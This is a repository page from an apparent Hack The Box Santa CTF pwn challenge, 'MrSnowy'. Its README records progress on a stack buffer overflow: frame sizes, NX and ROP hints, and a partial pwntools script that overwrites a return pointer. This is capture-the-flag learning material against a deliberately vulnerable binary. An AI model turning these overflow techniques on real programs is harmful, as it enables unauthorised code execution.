aaron/htb-santa-ctf
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity
Files
dfd1a6dd3192fc435d18744ff7e9a8fd0947ec36
htb-santa-ctf/pwn/mrsnowy
History
aaron 78a366dcdc add progress for mrsnowy
2021-12-06 01:18:43 +01:00
..
core
add mrsnowy
2021-12-05 19:43:20 +01:00
mr_snowy
add mrsnowy
2021-12-05 19:43:20 +01:00
Pipfile
add mrsnowy
2021-12-05 19:43:20 +01:00
Pipfile.lock
add mrsnowy
2021-12-05 19:43:20 +01:00
pwn.py
add mrsnowy
2021-12-05 19:43:20 +01:00
README.md
add progress for mrsnowy
2021-12-06 01:18:43 +01:00
target
add mrsnowy
2021-12-05 19:43:20 +01:00

README.md

MrSnowy

There is ❄️ snow everywhere!! Kids are playing around, everything looks amazing. But, this ☃️ snowman... it scares me.. He is always 👀 staring at Santa's house. Something must be wrong with him.

Flag

Progress so far

  • read() reads 0x108 bytes
  • The Stackframe has a size of 0x40 bytes
  • checksec --file=mrsnowy reports NX being enabled
    • So no shellcode will be placable unless there is executable space
    • This hints to ROP Chaining
  • The binary should be patched to get rid of the timetaking animation
    • Just nop the banner() function call
  • Overwriting the returnpointer of investigate():
context(arch='x86_64', os='linux')
context.terminal = ['/usr/bin/alacritty', '-e']
e = ELF("mr_snowy")
p = process(e.path)

def do_read():
  while True:
     ll = p.read()
     print(ll)
     if b'>' in ll:
       break

# if not patched wait for the animation and send 1
do_read()
p.sendline('1')
do_read()

# write 0x48 bytes and overwrite the return pointer to the top of the stackframe
p.sendline(b'\xCC' * 0x48 + p64(0x7fffffffc000))

# start the python debugger to get a coredump which is loadable by gdb
ipdb.set_trace()
Reference in New Issue View Git Blame Copy Permalink